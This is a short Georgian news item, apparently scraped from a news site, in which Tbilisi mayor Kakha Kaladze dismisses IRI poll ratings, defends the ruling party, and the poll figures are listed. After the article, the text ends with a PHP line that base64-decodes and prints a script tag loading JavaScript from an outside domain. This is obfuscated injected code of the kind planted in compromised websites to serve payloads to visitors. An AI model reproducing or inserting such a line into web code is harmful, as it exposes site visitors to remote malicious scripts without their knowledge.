celsiusi
ავერსი საქკაბელი
თბილისის მერმა, კახა კალაძემ IRI-ს მიერ გამოქვეყნებული რეიტინგების შეფასებისას მედიასთან განაცხადა, რომ მისთვის ყველაზე კარგი საზომი არის საზოგადოების მხარდაჭერა და მათთან ურთიერთობა.
 
დედაქალაქის მერის თქმით, კვლევების გარეშეც თვალსაჩინო და ცხადია საზოგადოების ნდობა მმართველი პარტიისადმი.
 
„ჩემი დამოკიდებულება მსგავს კვლევებთან მიმართებით იცით. არაერთხელ დამიფიქსირებია პოზიცია და რა თქმა უნდა არც ამჯერად შემიცვლია აზრი. შეგიძლიათ ნახოთ კვლევები 2012 წლიდან მოყოლებული, რას აცხადებდნენ და შემდეგ რა შედეგები დგებოდა არჩევნებზე. ჩემთვის ყველაზე კარგი და მნიშვნელოვანი საზომი არის საზოგადოების მხარდაჭერა, მათთან ურთიერთობა. არასდროს გამიწყვეტია კავშირი საზოგადოებასთან, ყოველდღიური ურთიერთობა მაქვს და ის განწყობა და დამოკიდებულება, რაც საზოგადოების მხრიდან იგრძნობა, არის ყველაზე მნიშვნელოვანი. ძალიან ვაფასებ და ვუფრთხილდები ამ ურთიერთობებს. ყველაფერს გავაკეთებ მომავალშიც იმისთვის, რომ ჩვენი ქალაქი იყოს კიდევ უფრო მოწესრიგებული, კიდევ უფრო ლამაზი, მწვანე და მასში მცხოვრებ ადამიანებს ჰქონდეთ კომფორტულად ცხოვრების საშუალება.
 
მმართველ პარტიას აქვს ძალიან დიდი მხარდაჭერა საზოგადოების მხრიდან. ეს ყოველდღიურ ცხოვრებაშიც ჩანს, იმიტომ რომ ჩვენ ვართ პარტია, რომელიც ზრუნავს ხალხზე. შეიძლება, რაღაც შეცდომები ჩვენც გვაქვს, რაღაცის გაკეთება დავაგვიანეთ, მაგრამ არასდროს მიგვიყენებია შეურაცხყოფა ქართველი ხალხისთვის, არასდროს დაგვიჩაგრავს ჩვენი ქვეყნის მოქალაქე, არასდროს წაგვირთმევია. გახსოვთ, წლების განმავლობაში რა დამოკიდებულება იყო ბიზნესის მიმართ, რა ხდებოდა ციხეებში პატიმრების მიმართ. ეს ყველაფერი საზოგადოებას ახსოვს“, – განაცხადა კახა კალაძემ.
 
შეგახსენებთ, რომ IRI-ის მიერ გუშინ გამოქვეყნებული კვლევის მიხედვით, ილია მეორის მიმართ დადებითი განწყობა აქვს გამოკითხულთა 92 პროცენტს, 53 პროცენტი ასახელებს კახა კალაძეს, 52 პროცენტი – სალომე ზურაბიშვილს, 47 პროცენტი კი ირაკლი ღარიბაშვილს.
882
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");